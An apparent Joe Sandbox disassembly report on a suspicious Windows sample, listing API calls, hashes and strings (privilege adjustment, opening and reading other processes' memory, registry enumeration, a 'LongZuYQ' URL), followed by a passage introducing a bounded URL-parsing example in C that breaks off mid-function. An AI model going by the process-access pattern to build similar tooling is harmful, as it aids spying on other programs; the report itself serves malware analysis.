                                                                                  • String ID: C:\pl.txt$SetChoseTypeMode : %d
                                                                                  • API String ID: 970810673-4200225807
                                                                                  • Opcode ID: 332b9206e26c81c0d270e162c3475eea375fbe17377a8052eb795af00532b126
                                                                                  • Instruction ID: 6eb93d4306041c1617d6be82efc56bb7e5005e2e372ccef2a7362af81b9da896
                                                                                  • Opcode Fuzzy Hash: 332b9206e26c81c0d270e162c3475eea375fbe17377a8052eb795af00532b126
                                                                                  • Instruction Fuzzy Hash: 0A0171B2808340ABDB10DB64CD45F5B7BE9AB99644F05481DF64593241DA74EA08CBE7
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0BE94B06,?,?,?,?,00000002,0BE94BB2,0BE92F57,0BE92F9F), ref: 0BE94A75
                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0BE94B06,?,?,?,?,00000002,0BE94BB2,0BE92F57,0BE92F9F), ref: 0BE94A7B
                                                                                  • GetStdHandle.KERNEL32(000000F5,0BE94AC4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0BE94B06), ref: 0BE94A90
                                                                                  • WriteFile.KERNEL32(00000000,000000F5,0BE94AC4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0BE94B06), ref: 0BE94A96
                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 0BE94AB4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleWrite$Message
                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                  • API String ID: 1570097196-2970929446
                                                                                  • Opcode ID: 03e3b295f75825e6921fe941e8e9d46660796ed06f75ed617fb145961500a7ca
                                                                                  • Instruction ID: 9ab555edce0f81320b1e2eb7e4241a2a269ff26153836e8df46bc097f29cbbe3
                                                                                  • Opcode Fuzzy Hash: 03e3b295f75825e6921fe941e8e9d46660796ed06f75ed617fb145961500a7ca
                                                                                  • Instruction Fuzzy Hash: 4BF03061A84346B9FF74B2B6BC47F5D22AC4785F15F94A305F311F80C0A7E485CAA72A
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0BEB5EBE
                                                                                  • GetDeviceCaps.GDI32(?,00000068), ref: 0BEB5EDA
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0BEB5EF9
                                                                                  • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0BEB5F1D
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 0BEB5F3B
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0BEB5F4F
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0BEB5F6F
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0BEB5F87
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1781840570-0
                                                                                  • Opcode ID: 50ef5ee11e99f094504c65f3c85f05c36f96962c9a233e09ea580523a9ad522f
                                                                                  • Instruction ID: d2187175e2da44d00605ae737cbba20778aa26c72f818de3ae2b51ef009c44fb
                                                                                  • Opcode Fuzzy Hash: 50ef5ee11e99f094504c65f3c85f05c36f96962c9a233e09ea580523a9ad522f
                                                                                  • Instruction Fuzzy Hash: FC214FB1A50218BEEF50DBA4DD96FAEB3ACEB08704F501591FB04E6180D774AE489B24
                                                                                  APIs
                                                                                  • GlobalLock.KERNEL32(?), ref: 6A6EF203
                                                                                  • lstrcmpA.KERNEL32(?,?), ref: 6A6EF20F
                                                                                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 6A6EF221
                                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6A6EF241
                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6A6EF249
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 6A6EF253
                                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6A6EF260
                                                                                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6A6EF278
                                                                                    • Part of subcall function 6A6F58DA: GlobalFlags.KERNEL32(?), ref: 6A6F58E9
                                                                                    • Part of subcall function 6A6F58DA: GlobalUnlock.KERNEL32(?), ref: 6A6F58FB
                                                                                    • Part of subcall function 6A6F58DA: GlobalFree.KERNEL32(?), ref: 6A6F5906
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                  • String ID:
                                                                                  • API String ID: 168474834-0
                                                                                  • Opcode ID: 6f499e8f74f56ed10b7802277750808c288ab35d581c0e12046e1d66739fc953
                                                                                  • Instruction ID: 0f28cd36abda401f27ca46893b2844d9699a9639ac41c3bb776ad62502070de1
                                                                                  • Opcode Fuzzy Hash: 6f499e8f74f56ed10b7802277750808c288ab35d581c0e12046e1d66739fc953
                                                                                  • Instruction Fuzzy Hash: F311DAB5504500BBCF224BB2CC8DC6B7AFEFF89708B150029F605E1060DB35CD02AB24
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 6A6FAB4E
                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 6A6FAB55
                                                                                  • GetSystemMetrics.USER32(00000002), ref: 6A6FAB5C
                                                                                  • GetSystemMetrics.USER32(00000003), ref: 6A6FAB66
                                                                                  • GetDC.USER32(00000000), ref: 6A6FAB70
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 6A6FAB81
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6A6FAB89
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 6A6FAB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1151147025-0
                                                                                  • Opcode ID: 0c27efdf647eae54a732e25d883644f7cf77e9cbe2599a142a51e647383fd313
                                                                                  • Instruction ID: 40b300c36b4172a9cbfbb6f6257e3766962487c0ace3714b93ea8ec7cfe5f1e5
                                                                                  • Opcode Fuzzy Hash: 0c27efdf647eae54a732e25d883644f7cf77e9cbe2599a142a51e647383fd313
                                                                                  • Instruction Fuzzy Hash: 1FF01DB1E40718AAEB105FB68C4AB167FE8FB86761F044536E605DB2C0DBB59C518FD0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 3886058894-0
                                                                                  • Opcode ID: 26fc8633026f330a037a17cae88990d3a3d9ce2dbda1e7c4a8d0db87d2db285e
                                                                                  • Instruction ID: dc2ff533f14a4a364bb6093594823feede2a5b0c19018f74dc0eb18f0d734364
                                                                                  • Opcode Fuzzy Hash: 26fc8633026f330a037a17cae88990d3a3d9ce2dbda1e7c4a8d0db87d2db285e
                                                                                  • Instruction Fuzzy Hash: 9C51C772A00605EBCB248FB9C94858E7BB7EF91324F118A69E834961D1DF709957CFA0
                                                                                  APIs
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0BEB6579
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0BEB6588
                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0BEB65DF
                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0BEB65ED
                                                                                  • DeleteObject.GDI32(?), ref: 0BEB65F6
                                                                                  • DeleteObject.GDI32(?), ref: 0BEB65FF
                                                                                  • CreateIcon.USER32(0BE90000,?,?,?,?,?,?), ref: 0BEB6627
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                  • String ID:
                                                                                  • API String ID: 1030595962-0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: 2$PrsProt
                                                                                  • API String ID: 2102423945-1774862053
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6F7FEB
                                                                                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 6A6F8014
                                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 6A6F8026
                                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 6A6F8037
                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 6A6F8053
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow$MessageSend_memset
                                                                                  • String ID: ,
                                                                                  • API String ID: 2997958587-3772416878
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6DBCCE
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  • _memset.LIBCMT ref: 6A6DBCDE
                                                                                  • _memset.LIBCMT ref: 6A6DBCF8
                                                                                  • _sprintf.LIBCMT ref: 6A6DBD0B
                                                                                  • _memset.LIBCMT ref: 6A6DBD1F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AllocHeap_malloc_sprintf
                                                                                  • String ID: 1
                                                                                  • API String ID: 1264483833-2212294583
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6A6F0BAA
                                                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 6A6F0C90
                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 6A6F0CAD
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6F0CCD
                                                                                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 6A6F0CE8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                  • String ID: Software\
                                                                                  • API String ID: 1666054129-964853688
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D776E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D77AC
                                                                                  • _memset.LIBCMT ref: 6A6D77C3
                                                                                  • _memset.LIBCMT ref: 6A6D77E0
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: LanderScr$http://www.LongZuYQ.com
                                                                                  • API String ID: 1275148839-1063765635
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E0B97
                                                                                  • _memset.LIBCMT ref: 6A6E0BAE
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                  • OutputDebugStringA.KERNEL32(6A7233DC,?,?,?,?,?,00000015,00000000), ref: 6A6E0BD0
                                                                                  • _memset.LIBCMT ref: 6A6E0C61
                                                                                  • _sprintf.LIBCMT ref: 6A6E0C81
                                                                                  Strings
                                                                                  • file path: %s, md5 :%s, match val : %d, xrefs: 6A6E0C7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AddressDebugHandleModuleOutputProcString_sprintf
                                                                                  • String ID: file path: %s, md5 :%s, match val : %d
                                                                                  • API String ID: 723078608-2925406424
                                                                                  • Opcode ID: c9344bc49ede084e9b808f921877528e5b07271e638e3e53509352d763e52b98
                                                                                  • Instruction ID: d5c06e6decf5f1d2a83f8d3cfabec2d4abb8f0278223232b1ddd6b98c98c9c53
                                                                                  • Opcode Fuzzy Hash: c9344bc49ede084e9b808f921877528e5b07271e638e3e53509352d763e52b98
                                                                                  • Instruction Fuzzy Hash: 8B210EB29482406BD320D754EC85FAB77E9AF90759F46083DF54993142EE30D90C8BA3
                                                                                  APIs
                                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 6A6F0096
                                                                                  • _memset.LIBCMT ref: 6A6F010E
                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6A6F0171
                                                                                  • LoadBitmapA.USER32(00000000,00007FE3), ref: 6A6F0189
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                  • String ID: $4}qj
                                                                                  • API String ID: 4271682439-973896021
                                                                                  • Opcode ID: 163551dadd80e396eee97badc4513f6f2a4da219993e23a835b6c3f4ffba075a
                                                                                  • Instruction ID: c0839fa049ba12d5925f4cb7a343e7f6e9412bf7abb7431c58bc87199139fd7b
                                                                                  • Opcode Fuzzy Hash: 163551dadd80e396eee97badc4513f6f2a4da219993e23a835b6c3f4ffba075a
                                                                                  • Instruction Fuzzy Hash: 82313571A002199BEB20CF64CC88BA97BF6FB49304F4644B6E549EB281DF308D458F50
                                                                                  APIs
                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 6A6F0A2C
                                                                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 6A6F0ABA
                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 6A6F0ADD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumH_prolog3_catch_Open
                                                                                  • String ID: Software\Classes\
                                                                                  • API String ID: 689246474-1121929649
                                                                                  • Opcode ID: 3482b3a452f67560d0662c0eff39b06b4c6744a2cbcb4875c96a2e62a002737e
                                                                                  • Instruction ID: 7e66b34280b34af0b720d472820a5533745300dd80a0c17a7a88eca33a5f75f5
                                                                                  • Opcode Fuzzy Hash: 3482b3a452f67560d0662c0eff39b06b4c6744a2cbcb4875c96a2e62a002737e
                                                                                  • Instruction Fuzzy Hash: E631BE72C001289BCB22DBA4CC48BDDB7F5AF09314F0602D5E999A3292EF305F959F91
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00000000,0BEEF74D), ref: 0BEEF6CC
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0BEEF74D), ref: 0BEEF6EC
                                                                                  • ReleaseMutex.KERNEL32(?,00000000,0BEEF74D), ref: 0BEEF713
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,0BEEF74D), ref: 0BEEF71E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$FileMutexReleaseUnmapView
                                                                                  • String ID: eno192$eno198
                                                                                  • API String ID: 809188715-4178521652
                                                                                  • Opcode ID: fd59739767e25ffe5bd97fde50b36ab5002fda3d133cc5f7cf1d10bc67647d4c
                                                                                  • Instruction ID: baca87fd2aa88f5df69b1fc6dde5b6819af1ec1a8dafee7101d01a5a6b24bef1
                                                                                  • Opcode Fuzzy Hash: fd59739767e25ffe5bd97fde50b36ab5002fda3d133cc5f7cf1d10bc67647d4c
                                                                                  • Instruction Fuzzy Hash: 72312A706212069FEB11EF6AE492A0A77F6EF88244F51B161E424CB7A0D734ED45CBE0
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6D8B1F
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8B83
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8BAB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
                                                                                  • String ID: c$m$o
                                                                                  • API String ID: 3693474235-1527384053
                                                                                  • Opcode ID: b66db8c1ba3223f2a51d441fa8c802093db5179209641cb697d7eeb4d318c65f
                                                                                  • Instruction ID: dd851ed8d2d1d6675ddb62b48b93879c8347671c22b1eca46f3d165bbb3c0f18
                                                                                  • Opcode Fuzzy Hash: b66db8c1ba3223f2a51d441fa8c802093db5179209641cb697d7eeb4d318c65f
                                                                                  • Instruction Fuzzy Hash: 6921A27250D3C09EC311DFA8888499BBFE45FA9248F080A6DF1D497242D664C70CCBB7
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91D13
                                                                                  • LocalFree.KERNEL32(00000000,00000000,7'), ref: 0BE91D25
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,7'), ref: 0BE91D49
                                                                                  • LocalFree.KERNEL32(00000000,00000000,00000000,7'), ref: 0BE91D9A
                                                                                  • RtlLeaveCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91DC8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$CriticalLocalSection$EnterLeaveVirtual
                                                                                  • String ID: 7'
                                                                                  • API String ID: 4212268253-3510403523
                                                                                  • Opcode ID: 93d954a5d932d4381d95fc8167ed5fdc76b3d7b18d8e79c905f5607d29579f79
                                                                                  • Instruction ID: ad6bead514783837abe81b76b91ae8b9e8a47a0e52f107d5ed2fcf5c02dfdf21
                                                                                  • Opcode Fuzzy Hash: 93d954a5d932d4381d95fc8167ed5fdc76b3d7b18d8e79c905f5607d29579f79
                                                                                  • Instruction Fuzzy Hash: 1F215CB4A04707BFEF11EBB9E446B9C77F5EB48705F116495E600E7A80D7389A48CB22
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _swscanf$_memset_vscan_fn
                                                                                  • String ID: %[^/]%s$%[^:]:%d%s$http://
                                                                                  • API String ID: 2379712460-1994117949
                                                                                  • Opcode ID: e38a0bf4f1233f8e38c072bb94d193ea068caa636057e390ae5f22d2fd6f609c
                                                                                  • Instruction ID: 8f3996b0ee8d66332af5e444072fede2b9b548f7ba4b0553715dd507fa366399
                                                                                  • Opcode Fuzzy Hash: e38a0bf4f1233f8e38c072bb94d193ea068caa636057e390ae5f22d2fd6f609c
                                                                                  • Instruction Fuzzy Hash: 04118CB1A0930067EA22C738DC48BEB73D86F96704F454828E98843245FF71E20982E7
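The block above is a URL splitter: the report lists the scanf formats `%[^/]%s` and `%[^:]:%d%s` together with the literal `http://`, which is the classic two-stage split of `http://host[:port]/path` into host, port and path. The following C program is an added example written for this page, not code recovered from the sample or from Joe Sandbox. It reuses the two formats from the report but adds a field width to every `%[...]` and `%s` conversion; the formats as printed in the report carry no width, and whether the sample's destination buffers are large enough for an attacker-controlled URL cannot be determined from this page. The order in which the sample applies the two formats, the default port, and all buffer sizes are assumptions, and narrow `sscanf` is used in place of the sample's wide-character `swscanf` so the program builds anywhere.

```c
#include <stdio.h>
#include <string.h>

/* Buffer sizes are assumptions for this example; the report does not show
 * the sample's buffer sizes, nor the order in which it applies the formats. */
#define HOST_BUF 64
#define PATH_BUF 256

struct url_parts {
    char host[HOST_BUF];
    int  port;
    char path[PATH_BUF];
};

/*
 * Split "http://host[:port][/path]" with the two scanf formats visible in the
 * report ("%[^/]%s" then "%[^:]:%d%s"), but with a field width on every %[...]
 * and %s conversion so no input can write past the fixed buffers.
 * Returns 1 on success and fills *out; returns 0 and leaves *out zeroed on
 * any malformed or over-long input.
 */
int parse_http_url(const char *url, struct url_parts *out)
{
    static const char prefix[] = "http://";
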